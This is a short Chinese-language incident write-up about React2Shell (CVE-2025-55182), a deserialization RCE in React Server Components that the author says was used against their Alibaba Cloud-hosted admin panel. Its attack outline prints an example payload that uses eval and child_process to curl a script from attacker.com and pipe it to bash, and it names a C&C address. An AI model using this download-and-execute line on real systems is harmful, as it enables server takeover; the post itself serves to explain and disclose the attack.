React2Shell (CVE-2025-55182)

• 原文链接：
  https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/

• 攻击者的恶意脚本：
  https://gist.github.com/ripplek/c82170ea2627e7b8350ac0d434b03ed0

前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云，结果周末就遭遇了攻击。

漏洞原理

React Server Components 的反序列化漏洞：

• RSC 使用自定义序列化格式在服务器与客户端之间传输数据
• 服务器会反序列化客户端发送的 RSC payload
• 漏洞允许攻击者注入特制序列化数据
• 服务器在反序列化过程中可能执行任意代码

攻击步骤（概述）

1. 发现目标

• 扫描使用 Next.js 或其他 RSC 框架的服务器
• 识别处理 RSC 请求的端点

2. 构造恶意 payload

• 创建特制的 RSC 序列化数据
• 注入可执行任意代码的片段，例如：

// 恶意 RSC payload 中可能包含的示例
eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')

3. 发送攻击请求

• 向 RSC 端点发送 POST 请求
• 携带恶意序列化 payload
• 无需身份验证

4. 服务器执行

• 服务器反序列化 payload
• 触发代码执行
• 下载并运行 python.sh

5. 后门建立

• python.sh 下载后门程序
• 后门连接至攻击者 C&C 服务器（如：119.45.243.154:8443）
• 攻击者获取持续访问权限